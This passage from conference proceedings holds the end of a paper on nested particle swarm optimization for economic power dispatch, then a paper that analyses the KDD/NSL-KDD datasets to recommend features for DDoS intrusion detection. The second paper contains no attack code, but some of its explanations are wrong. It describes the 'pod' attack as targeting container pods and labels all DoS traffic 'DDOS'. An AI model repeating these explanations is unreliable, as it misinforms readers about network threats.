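As a small illustration of Eq. (7), the sketch below evaluates the quadratic fuel cost for one candidate dispatch using the coefficients of Table 1; the dispatch vector itself is an illustrative assumption, and network losses and other constraints are ignored in this sketch.

# Hedged sketch: total fuel cost of Eq. (7) for one candidate dispatch, using the
# a, b, c coefficients listed in Table 1. The dispatch P is an assumed example.
import numpy as np

a = np.array([240, 200, 220, 200, 220, 190])                     # $ (constant terms)
b = np.array([7.0, 10.0, 8.5, 11.5, 10.5, 12.0])                 # $/MW
c = np.array([0.0070, 0.0095, 0.0090, 0.0090, 0.0080, 0.0075])   # $/MW^2

P = np.array([400.0, 150.0, 200.0, 100.0, 120.0, 80.0])          # assumed dispatch in MW

total_cost = np.sum(a + b * P + c * P ** 2)                      # Eq. (7)
print(round(total_cost, 2), "$/h")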

Fig. 1 Working of PSO

4 Introduction to Particle Swarm Optimization (PSO)

Particle swarm optimization (PSO) is motivated by the social behavior of birds [12, 13]. PSO is a very simple yet powerful algorithm. Two principles underlie its functioning: communication, i.e., informing the other particles of the measured fitness, and learning. The algorithm aims at finding a global minimum. The working of standard PSO is shown in Fig. 1.

5 Proposed Approach

Nested PSO is a PSO variant that resolves two or more problems concurrently [14–17]. In the algorithm used here, two PSOs are combined, or nested, to solve associated concerns simultaneously: an outer and an inner PSO work together. The advantage is that two objectives can be achieved easily, one being considered while the other is being optimized. The working of the proposed methodology is shown in Fig. 2.
The PSO attempts to obtain ED generation solutions in each iteration. To meet the system demand and the realistic operating constraints of the generating units, which include ramp-up and ramp-down rate limits and prohibited operating zones, economic dispatch planning must produce an optimized dispatch among the operating generating units as stated in Table 1.

Fig. 2 Relationship between internal and external PSO

Table 1 Characteristics and initial status of units

Unit  P_min (MW)  P_max (MW)  a ($)  b ($/MW)  c ($/MW²)  UR (MW/h)  DR (MW/h)  PZ (MW)
1     100         500         240    7.0       0.0070     80         120        [210–240], [350–380]
2     50          200         200    10.0      0.0095     50         90         [90–110], [140–160]
3     80          300         220    8.5       0.0090     65         100        [150–170], [210–240]
4     50          150         200    11.5      0.0090     50         90         [80–90], [110–120]
5     50          200         220    10.5      0.0080     50         90         [90–110], [140–150]
6     50          120         190    12.0      0.0075     50         90         [75–85], [100–105]

5.1 Working of the Proposed Approach (Pseudo Code)

1. Take Generator Data


2. Setting Up PSO Parameters
Maximum Iterations (N)
Size of the population (P)
Constriction Coefficients
Inertia Weight Damping Ratio
Personal Learning and Global Learning Coefficient
Velocity Limits
3. Initialization of Position, Cost, and Velocity of particles
for i=1:P
Initialize Position
Initialize Velocity
Evaluation
Update Personal and Global Best
end for
4. Beginning of the main loop of PSO
for j=1:N
for i=1:P
Update Velocity
Apply Velocity Limits
Update Position
Apply Position Limits
Update Personal and Global Best
end for
end for
5. Evaluate Results
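The paper's implementation was carried out in MATLAB; purely as an illustrative sketch of the core loop above, a simplified single-level PSO for the dispatch cost of Eq. (7), without the nested structure, ramp limits, or prohibited zones, could look as follows in Python. Parameter values mirror Tables 1 and 2 where possible, and the remaining values (load demand, penalty weight, random seed) are assumptions.

# Hedged sketch of a basic PSO loop for the ED cost. This is a simplified,
# single-level version (no nesting, ramp limits, or prohibited zones).
import numpy as np

a = np.array([240, 200, 220, 200, 220, 190])
b = np.array([7.0, 10.0, 8.5, 11.5, 10.5, 12.0])
c = np.array([0.0070, 0.0095, 0.0090, 0.0090, 0.0080, 0.0075])
p_min = np.array([100, 50, 80, 50, 50, 50], dtype=float)
p_max = np.array([500, 200, 300, 150, 200, 120], dtype=float)
demand = 1000.0                                              # assumed load demand (MW)

def cost(P):
    # Fuel cost plus a quadratic penalty for violating the power balance constraint.
    return np.sum(a + b * P + c * P**2) + 1e4 * (np.sum(P) - demand) ** 2

rng = np.random.default_rng(0)
n_particles, n_iter, w, c1, c2 = 10, 100, 1.0, 2.0, 2.0      # values from Table 2
X = rng.uniform(p_min, p_max, size=(n_particles, 6))          # positions (candidate dispatch)
V = np.zeros_like(X)
pbest, pbest_cost = X.copy(), np.array([cost(x) for x in X])
gbest = pbest[pbest_cost.argmin()].copy()

for _ in range(n_iter):
    r1, r2 = rng.random(X.shape), rng.random(X.shape)
    V = w * V + c1 * r1 * (pbest - X) + c2 * r2 * (gbest - X)   # velocity update
    X = np.clip(X + V, p_min, p_max)                            # position update + limits
    costs = np.array([cost(x) for x in X])
    improved = costs < pbest_cost
    pbest[improved], pbest_cost[improved] = X[improved], costs[improved]
    gbest = pbest[pbest_cost.argmin()].copy()
    w *= 0.99                                                   # inertia damping (wdamp)

print(round(cost(gbest), 2))                                    # best cost found by the sketch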

5.2 Experiment Design

The proposed approach is tested on a system composed of 6 units over a 24 h time horizon. Table 1 summarizes the characteristics and initial status of the units. The corresponding minimum and maximum power generation capacities of the units in megawatts, the values of the cost coefficients (a, b, and c), the ramp rates (UR and DR denote ramp-up and ramp-down rates, respectively), and the prohibited zones (PZ) are shown. Table 2 summarizes the parameter settings of PSO. Parameters include the maximum iterations (N), swarm size (P), inertia weight (w), damping

Table 2 PSO parameters

Parameter setting  PSO   Nested PSO
N                  100   10
P                  10    10
w                  1     1
wdamp              0.99  0.99
c1                 2     2
c2                 2     2
phi1               2.05  2.05
phi2               2.05  2.05

ratio (wdamp), the personal and global learning coefficients (c1 and c2), and the constriction coefficients (phi1 and phi2).
The loss coefficients can be defined with matrix B as follows.
B =
[  0.0017   0.0012   0.0007  −0.0001  −0.0005  −0.0002
   0.0012   0.0014   0.0009   0.0001  −0.0006  −0.0001
   0.0007   0.0009   0.0031   0.0000  −0.0010  −0.0006
  −0.0001   0.0001   0.0000   0.0024  −0.0006  −0.0008
  −0.0005  −0.0006  −0.0010  −0.0006   0.0129  −0.0002
  −0.0002  −0.0001  −0.0006  −0.0008  −0.0002   0.0150 ]
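Such a B matrix is typically used to estimate transmission losses via the quadratic form P_l = P^T B P; a minimal sketch of that calculation is given below, with the dispatch vector again being an illustrative assumption rather than a result of the paper.

# Hedged sketch: transmission loss from the B-coefficient matrix, P_l = P^T B P.
# B is taken from the matrix above; the dispatch P is an assumed example.
import numpy as np

B = np.array([
    [ 0.0017,  0.0012,  0.0007, -0.0001, -0.0005, -0.0002],
    [ 0.0012,  0.0014,  0.0009,  0.0001, -0.0006, -0.0001],
    [ 0.0007,  0.0009,  0.0031,  0.0000, -0.0010, -0.0006],
    [-0.0001,  0.0001,  0.0000,  0.0024, -0.0006, -0.0008],
    [-0.0005, -0.0006, -0.0010, -0.0006,  0.0129, -0.0002],
    [-0.0002, -0.0001, -0.0006, -0.0008, -0.0002,  0.0150],
])
P = np.array([400.0, 150.0, 200.0, 100.0, 120.0, 80.0])   # assumed dispatch (MW)

P_loss = P @ B @ P        # quadratic-form loss estimate
print(round(P_loss, 2))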

6 Results

Figure 3 shows the external iterations for optimizing the cost, and Fig. 4 shows the total decrease in cost. The proposed technique uses ten external iterations, each of which further consists of one hundred sub-iterations. The optimized cost turned out to be $197,320. The implementation was done in MATLAB on an Intel Core i5 at 3.4 GHz with 4 GB of RAM.

7 Conclusion

In this paper, a modified PSO is utilized to solve the economic dispatch (ED) problem. The proposed technique takes into account various constraints, including ramp-up and ramp-down limits and other operating constraints, and has given promising results.

Fig. 3 Optimized cost

Fig. 4 Effect of iterations on cost



References

1. Wood, A. J., & Wollenberg, B. F. (2007). Power generation, operation and control (2nd ed).
Wiley.
2. Yu, X., Zhang, X. (2014). Unit commitment using Lagrangian relaxation and particle swarm
optimization. International Journal of Electrical Power and Energy Systems
3. Singh, A., & Kumar, S. (2016). Differential evolution: An overview. Advances in Intelligent
Systems and Computing. https://doi.org/10.1007/978-981-10-0448-3_17
4. Anand, H., Narang, N., & Dhillon, J. S. (2018). Profit based unit commitment using hybrid
optimization technique. Energy. https://doi.org/10.1016/j.energy.2018.01.138
5. Singh, A., & Khamparia, A. (2020). A hybrid whale optimization-differential evolution and
genetic algorithm based approach to solve unit commitment scheduling problem: WODEGA.
Sustainable Computing: Informatics and Systems. https://doi.org/10.1016/j.suscom.2020.
100442
6. Deka, D., & Datta, D. (2019). Optimization of unit commitment problem with ramp-rate
constraint and wrap-around scheduling. Electric Power Systems Research. https://doi.org/10.
1016/j.epsr.2019.105948
7. Xin-gang, Z., Ze-qi, Z., Yi-min, X., & Jin, M. (2020). Economic-environmental dispatch of
microgrid based on improved quantum particle swarm optimization. Energy. https://doi.org/
10.1016/j.energy.2020.117014
8. Wang, Q.-G., Ming, Yu., & Liu, J. (2020). An integrated solution for optimal generation oper-
ation efficiency through dynamic economic dispatch. Materials Today: Proceedings. https://
doi.org/10.1016/j.matpr.2020.03.535
9. Chen, Xu., Li, K., Bin, Xu., & Yang, Z. (2020). Biogeography-based learning particle swarm
optimization for combined heat and power economic dispatch problem. Knowledge-Based
Systems. https://doi.org/10.1016/j.knosys.2020.106463
10. Hailiang, Xu., Meng, Z., & Wang, Y. (2020). Economic dispatching of microgrid considering
renewable energy uncertainty and demand side response. Energy Reports. https://doi.org/10.
1016/j.egyr.2020.11.261
11. Goudarzi, A., Li, Y., & Xiang, Ji. (2020). A hybrid non-linear time-varying double-weighted
particle swarm optimization for solving non-convex combined environmental economic
dispatch problem. Applied Soft Computing. https://doi.org/10.1016/j.asoc.2019.105894
12. Kennedy, J., & Eberhart, R. (1995). Particle swarm optimization. In Proceedings of ICNN’95—
International Conference on Neural Networks, Perth, WA, Australia. https://doi.org/10.1109/
ICNN.1995.488968
13. Shi, Y., & Eberhart, R. (1998). A modified particle swarm optimizer. In 1998 IEEE Inter-
national Conference on Evolutionary Computation Proceedings. IEEE World Congress on
Computational Intelligence. https://doi.org/10.1109/ICEC.1998.699146
14. Eberhart, R. C., Groves, D. J., & Woodward, J. K. (2017). Deep swarm: Nested particle swarm
optimization. In 2017 IEEE Symposium Series on Computational Intelligence (SSCI), Honolulu,
HI. https://doi.org/10.1109/SSCI.2017.8280920
15. Adedeji, P. A., Akinlabi, S., Madushele, N., & Olatunji, O. O. (2020). Wind turbine power output
very short-term forecast: A comparative study of data clustering techniques in a PSO-ANFIS
model. Journal of Cleaner Production. https://doi.org/10.1016/j.jclepro.2020.120135
16. Zhang, X., Lin, Q., Mao, W., Liu, S., Dou, Z., & Liu, G. (2020). Hybrid particle Swarm and
Grey Wolf Optimizer and its application to clustering optimization. Applied Soft Computing.
https://doi.org/10.1016/j.asoc.2020.107061
17. Faisal, M., Hannan, M. A., Ker, P. J., Abd. Rahman, M. S., Begum, R. A., & Mahlia, T. M. I
(2020). Particle swarm optimised fuzzy controller for charging–discharging and scheduling of
battery energy storage system in MG applications. Energy Reports. https://doi.org/10.1016/j.
egyr.2020.12.007
Recommendations for DDOS
Attack-Based Intrusion Detection System
Through Data Analysis

Sagar Pande, Aditya Khamparia, and Deepak Gupta

Abstract As internet usage increases day by day, it is essential to secure the network from intruders. This indicates the necessity of constructing an intrusion detection system (IDS). However, one must know on what basis the IDS should be built. This motivated us to form recommendations that can act as a basis for the development of an IDS. In this paper, we provide recommendations by analyzing the standard datasets KDD and NSL-KDD. MS-Excel was utilized for the analysis.

Keywords NSL-KDD · KDD · TCP · UDP · ICMP · Services · Flags

1 Introduction

Network security has become particularly relevant as computer networks have become extensively utilized in all facets of our lives. A network needs to maintain the security of user details in terms of confidentiality, integrity, and availability, and any activity that compromises any of these aspects can be deemed a network intrusion. The system that watches for such compromises, or intrusions, is called an intrusion detection system (IDS), an integral component of network protection systems. An IDS normally inspects the packets transmitted over a given network to decide whether each packet shows signs of interference. A well-organized and structured IDS can recognize the features of most intrusion activities and automatically respond to them by reporting or sending alerts to security logs. Various types of IDS exist, and these can be categorized into two types based on their principal recognition methodology: misuse recognition and anomaly
S. Pande (B) · A. Khamparia


School of Computer Science and Engineering, Lovely Professional University, Punjab, India
D. Gupta
Department of Computer Science Engineering, Maharaja Agrasen Institute of Technology, New
Delhi, India
e-mail: deepakgupta@mait.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_73

recognition. Misuse recognition-based IDSs rely on knowledge of known attacks: such an IDS must describe the features or attributes of intrusions and their rules clearly and store them in a library, and intrusions are then detected by matching observed scenarios against the existing rules. These IDSs can attain very good accuracy along with a low false-alarm rate, but they can only detect attacks that are in the library, which implies that they cannot detect unknown threats. On the contrary, anomaly recognition-based IDSs rely on observed behavior: such an IDS must define the normal activities of a network and then identify whether the current activities have diverged from them. These IDSs only have to describe the normal state of activity of a certain network, without prior knowledge of various intrusion activities. Consequently, this type of IDS is able to identify unknown activities in the network, although this may lead to a higher false-alarm rate. Currently, network configurations are becoming more complex, and intrusion approaches are becoming more sustained and obfuscated, generating further difficulties for IDSs.
Through these IDSs, huge amounts of data can be collected from the network to identify the various threats it faces. Many such threats exist; some of the popular ones are DDOS, pod, Smurf, and teardrop attacks. DDOS stands for distributed denial-of-service; as the name indicates, this threat denies users entry into the network by creating high traffic at the targeted server, and as a result various components of the infrastructure, such as computers and other network resources, are exploited. A pod is a component that acts as a deployment unit and is addressable through its own IP address; it can contain one or more containers, usually one. Attacks on these pods steal the IP address and generate messages from that address as if they were coming from the proper server, and a user trying to reach a particular pod is denied, so it is also a form of DDOS. A Smurf threat is a type of DDOS threat that renders computer networks inoperable; a Smurf program carries out this threat by exploiting vulnerabilities in two vital protocols, IP and ICMP. The teardrop threat is also a type of DDOS threat in which the intruder sends packets with mutated data to a user's computer; the errors caused by those packets reduce the performance of the server, and the intruder exploits this scenario to access data. It is considered effective because it relies on vulnerabilities in the two vital protocols IP and TCP.
From the above discussion, one can understand that not only threats but also
protocols play an important role in an effective attack as well as exploitation. The
popular network protocols are TCP, IP, UDP, and ICMP. TCP stands for transmission control protocol; it plays a vital role in sending a message from sender to receiver by dividing the message into packets, which are reassembled at the receiver's end. IP stands for Internet protocol; it is responsible for IP addressing and directs the packets from sender to receiver. Most commonly, this protocol is utilized

along with TCP. UDP stands for user datagram protocol, which is considered a substitute for TCP as a communication protocol; it majorly concentrates on packet-loss tolerance and low-latency linking among applications. ICMP stands for Internet control message protocol, which is a supporting protocol of the IP suite; it is used to generate success or error reports on operational data when two parties communicate through network devices such as routers.
The major contributions of the proposed framework are as follows:
• Analyzing the standard datasets KDD and NSL-KDD.
• Identifying the importance of NSL-KDD when compared with the other mentioned dataset.
• Analyzing NSL-KDD and thereby generating recommendations that will be helpful for further research.
The paper is organized as follows. Section 2 discusses the related work on intrusion detection systems and threats. Section 3 discusses the analysis of the considered dataset and the recommendations based on that analysis. Section 4 presents the conclusion related to DOS threats and the normal activities of the network.

2 Related Work

Ruan et al. [1] implemented visualization of the popular KDD data in the context of the issues faced when analyzing big data with its various characteristics such as volume, variety, and velocity. Sampling, tabular weights, and hashing methodologies were adopted to examine this dataset in depth and to recognize the cluster of normal traffic and the other clusters with their corresponding attacks. Ji et al. [2] identified how essential an IDS is for securing the user's network and proposed a method to classify the various attacks using the KDD and NSL-KDD datasets with the aid of an artificial neural network. The proposed work achieved good overall accuracy but failed to achieve good accuracy when classifying the individual categories of attacks. Ibrahimi and Ouaddane [3] pointed out the importance of IDSs and noted that the major research applies machine learning to the data collected through an IDS to categorize the various attacks along with the normal category. Their framework relies on popular dimensionality-reduction methodologies such as linear discriminant analysis and principal component analysis to identify the anomalies in the NSL-KDD dataset, thereby improving the conditions for classifying the various attacks. Othman et al. [4] observed that the data collected through IDSs are increasing both in size and in the number of features, which motivated the use of a big data framework for classifying the various attacks. The proposed framework utilized Spark as the big data framework, a chi-square selector for the selection of vital features, and a support vector machine for the classification of attacks. The complete framework was based on the KDD dataset; its training and prediction times are much lower than those of an SVM-only or logistic-regression-only framework.
Jia et al. [5] proposed a framework based on a customized deep neural network to classify various attacks using the KDD and NSL-KDD datasets obtained through IDS. The customized deep neural network was framed with four hidden layers, and through this framework they were able to achieve an accuracy of 99.9%. The article claims that this customized neural network can be used along with IDS to improve the security of the network. Anand Sukumar et al. [6] proposed a framework for identifying the kind of attack through IDS with the aid of a combination of a genetic algorithm and the K-means methodology. It was implemented on the KDD99 dataset. Yet, the accuracy attained by the proposed model is minimal, and better models than this one already exist. Basnet et al. [7] explored the potential and efficiency of deep learning methodologies for the identification and classification of kinds of intrusion. It was implemented with the aid of the CSE-CIC-IDS2018 dataset and was able to achieve an accuracy of 99%. Kumar et al. [8] proposed a unified model based on machine learning to integrate IDS and IoT. The inspiration for this methodology was the identification that internet usage affects the devices communicating over the wireless network and increases their susceptibility to various security attacks. This framework was implemented using the UNSW-NB15 dataset, and the proposed model attained better accuracy than the other two approaches, ENADS and DENDRON. Khonde and Ulagamuthalvi [9] mainly focused on reducing the number of features available in the standard KDD99 dataset, after which the obtained data were used for the classification of various types of attacks. The classification was implemented using the random forest methodology and attained about 95% accuracy. Pawlicki et al. [10] discussed the potential to degrade the efficiency of an improved IDS during the testing phase by generating adversarial attacks using four newly proposed procedures, and provided a way of detecting these threats. Both the ANN and the four approaches for rendering adversarial attacks are presented with the necessary context. The resulting detection system is comprehensive, and the obtained findings were compared across five different classifiers. To the best of their understanding, the identification of such detrimental threats on ANN-based IDSs had not yet been thoroughly studied.
Ji and Li [11] suggested an IDS based on a deep neural network combined with the FM methodology. It was implemented on the KDD99 dataset, and the accuracy attained through this framework was about 93.4%. Su et al. [12] proposed a deep learning-based IDS, called BAT, for detecting various attacks on the network with enhanced accuracy. This model is a combination of two mechanisms, bidirectional long short-term memory and an attention mechanism, which captures the vital attributes for the categorization of network traffic. Besides, more convolutional layers were attached for sample data processing, with a SoftMax activation function, to attain successful classification. This model enhanced the effectiveness of recognizing anomalies that exist in the network. The NSL-KDD dataset was utilized for the implementation of the proposed model. Abrar et al. [13] compared the performance of identifying threats in the network through various machine learning methodologies based on the NSL-KDD dataset. Instead of using the complete dataset, four sample datasets were derived from the main dataset and utilized for the comparison. Before deriving the various samples, preprocessing was applied to discard the unnecessary features from NSL-KDD. The work concluded that the random forest, extra tree classifier, and decision tree methodologies perform better than the other machine learning methodologies. Gao et al. [14] researched how to generate an ensemble technique using machine learning methodologies. The attained accuracy is promising but not at a good level. Through this work, the authors' idea of going with ensembling methodologies is appreciable. In this respect, there is a high necessity for proper preprocessing as well as optimized attribute selection. The proposed framework was implemented on the NSL-KDD dataset. Aljawarneh et al. [15] implemented a hybrid model for classifying the threats in two different forms, binary and multi-class classification. The hybrid model was able to attain an accuracy of 99.81% for the binary classification and 98.56% for the multi-class classification. It was implemented on the NSL-KDD dataset. The proposed model has two sections: the first section deals with the filtering of attributes, and the second section deals with the combination of various classifiers that help classify the threats in the network. Bhattacharjee et al. [16] employed an IDS model in which a fuzzy membership function was applied to a vectorized fitness function along with a genetic algorithm for the categorization of threats that exist in the network [17]. It was implemented on the NSL-KDD dataset.
From the above discussion, one can understand that active research on intrusion detection systems, carried out by classifying the various threats that exist in the network, is widely going on. These researches can be grouped by the methodologies they use, based on machine learning and deep learning [18]. The popular datasets utilized for this scenario are KDD and NSL-KDD. Still, there is a necessity to identify a strong basis for the development of intrusion detection systems [19]. For such a scenario, it is necessary to identify certain recommendations based on the various threats, protocols, services, and flags. This aspect is considered in the proposed framework.

3 Analysis

This section is organized into two subsections: the first subsection deals with the discussion of the dataset and the analysis based on it, and the second subsection deals with the recommendations produced from that analysis.

3.1 Dataset and System Discussion

The dataset considered is NSL-KDD, which is one of the popular datasets for work on intrusion detection systems. That is the main reason to consider this dataset and to analyze the scenario of the DDOS threat with respect to the various protocols and its distribution with respect to normal activities. The dataset consists of 42 attributes built on 41 features such as protocol, flag, duration, etc., together with a label indicating the threat. The attacks mentioned in this dataset can be categorized into the DDOS threat, the Probe threat, the R2L (Remote to Local) threat, the U2R (User to Root) threat, and normal activities. The analysis is done utilizing Office 365 MS Excel on the Windows 10 operating system.
We have considered two datasets in this work, KDD and NSL-KDD. NSL-KDD is extracted from the KDD dataset and amounts to about 20% of the entire KDD dataset. The NSL-KDD dataset was considered in terms of DDOS threats as well as normal activities for analysis purposes. The DDOS class consists of various sub-classes such as apache2, back, land, Neptune, mailbomb, pod, processtable, Smurf, teardrop, udpstorm, and worm. The summary of the KDD and NSL-KDD datasets is provided in Table 1. The same information can be visualized in Fig. 1.
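As a small illustration of how the per-class counts in Table 1 can be reproduced outside MS Excel, the sketch below loads an NSL-KDD file with pandas and maps the sub-class labels listed above to the DDOS and normal categories. The file name, the column layout (41 features followed by a label and a difficulty column), and the exact label spellings are assumptions about a local copy of the dataset rather than details taken from this paper.

```python
import pandas as pd

# Assumed local copy of the NSL-KDD training file (e.g., KDDTrain+.txt); the raw file
# has no header row, so column names are supplied manually. The first six feature
# names are the standard KDD ones; the remaining features are given generic names.
columns = (["duration", "protocol_type", "service", "flag", "src_bytes", "dst_bytes"]
           + [f"feature_{i}" for i in range(6, 41)] + ["label", "difficulty"])
df = pd.read_csv("KDDTrain+.txt", names=columns)

# DDOS sub-classes as listed above; records labelled "normal" are normal traffic.
ddos_labels = {"apache2", "back", "land", "neptune", "mailbomb", "pod",
               "processtable", "smurf", "teardrop", "udpstorm", "worm"}
df["category"] = df["label"].str.lower().map(
    lambda lab: "DDOS" if lab in ddos_labels else ("Normal" if lab == "normal" else "Other"))

# Counts comparable to Table 1 (Total / Normal / DDoS)
print("Total records:", len(df))
print(df["category"].value_counts())
```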
From Fig. 1, one can understand that the major proportion of either dataset consists of normal activities and DDOS threats. So, it is necessary to study and identify the consequences caused by DDOS threats to the network as well as to the various components in the network. Consider the distribution of DDOS threats and normal activities in each of these datasets. The KDD dataset contains 391,458 identified DDOS threats, and the NSL-KDD dataset contains 45,927 identified DDOS threats, as mentioned in Table 1. The distribution of only DDOS and normal activities in the NSL-KDD and KDD datasets is represented in Fig. 2a, b, respectively.
From Fig. 2, one can understand that the NSL-KDD dataset is much smaller than the KDD dataset, which is a very large dataset. Analyzing a dataset that is too small is not good for drawing network-related conclusions, whereas analyzing the larger KDD dataset is not feasible with MS Excel due to its size. The NSL-KDD data is therefore of medium size, and the recommendations drawn from it can be generalized for a network. The distribution of DDOS and normal activities according to protocols, as per the NSL-KDD dataset, is represented in Fig. 3.

Table 1 Summary of the KDD and NSL-KDD datasets

Dataset      Number of records
             Total       Normal     DDoS
KDD          488,735     97,277     391,458
NSL-KDD      113,270     67,343     45,927

Fig. 1 Graphical comparison among the various forms of KDD datasets

Fig. 2 DDOS vs Normal activities distribution for NSL-KDD and KDD datasets

Fig. 3 Distribution of DDOS and normal activities in NSL-KDD dataset



Fig. 4 The distribution of proportions of DDOS and normal activities in the KDD dataset

From Fig. 3, one can observe the distribution of DDOS and normal activities across the protocols as per the NSL-KDD dataset. The effect of DDOS threats is observed mainly in the case of the TCP protocol, followed by UDP, with the least effect of DDOS in the ICMP protocol. However, these figures represent only the number of cases in each of the protocols, and the comparison is more convenient when we consider the proportion. The proportion is calculated as given in Eq. (1):

Proportion_class = (Total number of cases registered under a class and a protocol) / (Total number of cases registered under a protocol)    (1)

where class represents DDOS and normal activities and protocol represents TCP, UDP, and ICMP. The proportions indicate the prevalence of a class (DDOS or Normal) within a particular protocol. The distribution of those proportions is represented in Fig. 4.
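Continuing from the loading sketch above, Eq. (1) amounts to a normalized cross-tabulation: for each protocol, the share of records that falls in each class. One way to compute it with pandas, reusing the hypothetical column names assumed earlier, is:

```python
# Keep only the two classes analyzed here (DDOS vs Normal)
subset = df[df["category"].isin(["DDOS", "Normal"])]

# Eq. (1): for each protocol, the proportion of records belonging to each class
prop_by_protocol = pd.crosstab(subset["protocol_type"], subset["category"],
                               normalize="index")
print(prop_by_protocol)   # rows: icmp / tcp / udp; columns: DDOS / Normal

# The same normalization over flags gives the flag-wise view shown in Fig. 5
prop_by_flag = pd.crosstab(subset["flag"], subset["category"], normalize="index")
print(prop_by_flag)
```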
Contrary to the count-based view of the DDOS effect on the protocols, in terms of proportions the DDOS effect is stronger in the case of both the ICMP and TCP protocols. In the case of UDP, the DDOS effect is still very low, which implies that the UDP protocol fares much better than the other two protocols. Similarly, let us consider how the classes (DDOS and normal) affect each of the flags by considering the proportions. The distribution of DDOS and normal activities as per the various flags in NSL-KDD is represented in Fig. 5. From Fig. 5, one can understand that the DDOS effect is higher in the case of flags such as S0, RSTO, and REJ. The S0 flag indicates that a connection attempt was seen but there was no reply, the RSTO flag indicates that the originator reset the connection, and the REJ flag indicates that the connection attempt was rejected.

Fig. 5 Distribution of DDOS and normal activities as per the various flags in NSL-KDD

3.2 Recommendations

From the above analysis, certain recommendations were drawn with respect to the protocols, as follows. In the case of the ICMP protocol, the level of attack is at a medium level; services such as Eco_i and Urp_i are normal, but Ecr_i is very critical, as mentioned in Table 2. In the case of the TCP protocol, the level of attack is also at a medium level; services such as HTTP, SMTP, IRC, X11, and FTP_data are normal, the SF flag and Src_byte are always normal, S0 is under the maximum attack situation, and RSTO has about an 80% chance of being under attack. As mentioned earlier, UDP has very few chances of getting attacked. These details are generalized in Table 2. Similarly, the analysis was also made on the services as well as on the various flags, and these are presented in Tables 3 and 4, respectively; a small illustrative encoding of these observations is sketched after the tables.

Table 2 Analysis of protocol attack

S. No  Protocol_Type  Attack/normal  Service               Flag         Continuous
1      TCP            Mix            Private → Attack      S0 → attack  Src_byte → normal
                                     Http → Normal
2      UDP            Normal (94%)   Private → Attack      SF → attack  Src_byte → Balanced
                                     All other → Normal
3      ICMP           Mix            Ecr_i → Attack        SF → attack  Src_byte → attack
                                     Tim_i → Attack
                                     All other → normal

Table 3 Analysis of various services

Service    Attack/normal
Http       Normal
Private    Attack
Domain_u   Normal
Smtp       Normal
Ftp_data   Normal

Table 4 Analysis of various flags

Flag   Attack/normal      Service
SF     All others normal  Ecr_i → attack
                          Private → attack
S0     Almost all attack  http → attack
                          Private → attack
REJ    Balanced           Private → attack
RSTR   All others normal  http → attack
RSTO   Almost all attack  Uccp → attack
                          Telnet → attack
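The protocol, service, and flag observations of Tables 2, 3 and 4 can be read as simple screening rules. The sketch below encodes a few of them as an illustrative pre-filter for connection records; the rule set and the returned labels are only one possible interpretation of the tables, not a complete or validated detector.

```python
def screen_record(protocol_type: str, service: str, flag: str) -> str:
    """Rough triage of a connection record based on the observations in Tables 2-4."""
    protocol_type, service, flag = (s.lower() for s in (protocol_type, service, flag))

    # Flag-level hints (Table 4): S0 and RSTO are almost always attacks
    if flag in {"s0", "rsto"}:
        return "likely attack"
    # Service-level hints (Tables 2 and 3)
    if service in {"private", "ecr_i", "tim_i"}:
        return "likely attack"
    if service in {"http", "smtp", "domain_u", "ftp_data"}:
        return "likely normal"
    # Protocol-level hint (Table 2): UDP traffic was observed to be mostly normal
    if protocol_type == "udp":
        return "likely normal"
    return "inspect further"

print(screen_record("tcp", "private", "S0"))   # likely attack
print(screen_record("tcp", "http", "SF"))      # likely normal
```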

4 Conclusion

The proposed framework mainly analyzed the KDD and NSL-KDD datasets to identify the influence of the DDOS attack on various aspects such as protocols, services, and flags. The generalization would be more effective if the complete dataset were considered, which would become a good and effective challenge for the big data scenario. Based on these recommendations, the modeling of an effective IDS against DDOS attacks can be framed. This analysis can further be continued to obtain effective, in-depth recommendations for the other classes of attacks, such as the Probe attack, the R2L attack, and the U2R attack. If effective recommendations can be identified for all these classes of attacks, then the most effective intrusion detection can be framed.

References

1. Ruan, Z., Miao, Y., Pan, L., Patterson, N., & Zhang, J. (2017). Visualization of big data security:
A case study on the KDD99 cup data set. Digital Communications and Networks, 3, 250–259.
2. Ji, H., Kim, D., Shin, D., & Shin, D. (2018). A study on comparison of KDD CUP 99 and NSL-
KDD using artificial neural network. Lecture Notes in Electrical Engineering, 474, 452–457.
3. Ibrahimi, K., & Ouaddane, M. (2017). Management of intrusion detection systems based-
KDD99: Analysis with LDA and PCA. In: International Conference on Wireless Networks and
Mobile Communications (WINCOM) 2017.
4. Othman, S. M., Ba-Alwi, F. M., Alsohybe, N. T., & Al-Hashida, A. Y. (2018). Intrusion detection
model using machine learning algorithm on Big Data environment. Journal of Big Data, 5.
5. Jia, Y., Wang, M., & Wang, Y. (2019). Network intrusion detection algorithm based on deep
neural network. IET Information Security, 13, 48–53.
6. Anand Sukumar, J. V., Pranav, I., Neetish, M. M., & Narayanan, J. (2018). Network intrusion
detection using improved genetic k-means algorithm. In: 2018 International Conference on
Advances in Computing, Communications and Informatics (ICACCI), (pp. 2441–2446).
7. Basnet, R. B., Shash, R., Johnson, C., Walgren, L., & Doleck, T. (2019). Towards detecting
and classifying network intrusion traffic using deep learning frameworks. Journal of Internet
Services and Information Security, 9, 1–17.
8. Kumar, V., Das, A. K., & Sinha, D. (2019). UIDS: A unified intrusion detection system for IoT
environment. Evolutionary Intelligence.
9. Khonde, S., & Ulagamuthalvi, V. (2019). Fusion of feature selection and random forest for an anomaly-based intrusion detection system. Journal of Computational and Theoretical Nanoscience, 16, 3603–3607.
10. Pawlicki, M., Choraś, M., & Kozik, R. (2020). Defending network intrusion detection systems
against adversarial evasion attacks. Future Generation Computer Systems, 110, 148–154.
11. Ji, Y., & Li, X. (2020). An efficient intrusion detection model based on deep FM. In Proceedings
on 2020 IEEE 4th Information Technology, Networking, Electronic and Automation Control
Conference ITNEC 2020 (pp. 778–783).
12. Su, T., Sun, H., Zhu, J., Wang, S., & Li, Y. (2020). BAT: Deep learning methods on network
intrusion detection using NSL-KDD dataset. IEEE Access, 8, 29575–29585.
13. Abrar, I., Ayub, Z., Masoodi, F., & Bamhdi, A. M. (2020). A machine learning approach for
intrusion detection system on NSL-KDD dataset (pp. 919–924).
14. Gao, X., Shan, C., Hu, C., Niu, Z., & Liu, Z. (2019). An adaptive ensemble machine learning
model for intrusion detection. IEEE Access, 7, 82512–82521.
15. Aljawarneh, S., Aldwairi, M., & Yassein, M. B. (2018). Anomaly-based intrusion detection
